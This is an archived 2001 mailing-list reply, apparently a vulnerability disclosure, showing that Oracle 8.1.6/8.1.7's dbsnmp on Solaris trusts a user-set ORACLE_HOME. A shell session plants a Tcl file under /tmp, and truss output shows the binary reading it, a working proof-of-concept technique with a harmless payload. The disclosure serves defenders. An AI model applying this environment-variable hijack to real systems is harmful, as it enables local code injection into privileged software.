> Ismael Briones wrote:
> Oracle-8.1.6 is not vulnerable
This was an issue that existed with 8.0.5 and maybe even
before that. I had drafted a report on this on 6/22/2000
for in house reference. I have found that the following:
TESTED ON SPARC/solaris 2.7
===========================
> oracle-8.1.6 -> affected
> oracle-8.1.7 -> affected
are also susceptible to false $ORACLE_HOME values.
<-------------------------- snip -------------------------->
schoe@host $ echo $ORACLE_HOME
/usr/app/oracle/product/8.1.6
schoe@host $ unsetenv $ORACLE_HOME; /usr/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462
schoe@host $ unsetenv ORACLE_HOME
schoe@host $ mkdir -p /tmp/network/agent/config
schoe@host $ setenv ORACLE_HOME "/tmp"
schoe@host $ echo "return \$ORACLE_HOME" > /tmp/network/agent/config/nmiconf.tcl
schoe@host $ chmod +x /tmp/network/agent/config/nmiconf.tcl
schoe@host $ truss -fae /usr/oracle/product/8.1.6/bin/dbsnmp
...
3773: lstat64("/home", 0xFFBEE0F0) = 0
3773: lstat64("/home/..", 0xFFBEE0F0) = 0
3773: llseek(8, 0xFFFFFFFFFFFFFCFF, SEEK_CUR) = 276
3773: close(8) = 0
3773: close(7) = 0
3773: chdir("/tmp/network/agent/config") = 0
...
4509: close(7) = 0
4509: stat("/tmp/network/agent/config/nmiconf.tcl", 0xFFBEE93C) = 0
4509: open("/tmp/network/agent/config/nmiconf.tcl", O_RDONLY) = 7
4509: read(7, " r e t u r n $ O R A C".., 4096) = 20
4509: close(7) = 0
...
<-------------------------- snap -------------------------->
+--------------------------------------------------+
| Sung J. Choe / UNIX Admin / www.CheapTickets.com |
| |
| Ph: 808/945.7439 Fax: 808/946.5993 |
:--------------------------------------------------+
This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 22:24:11 PDT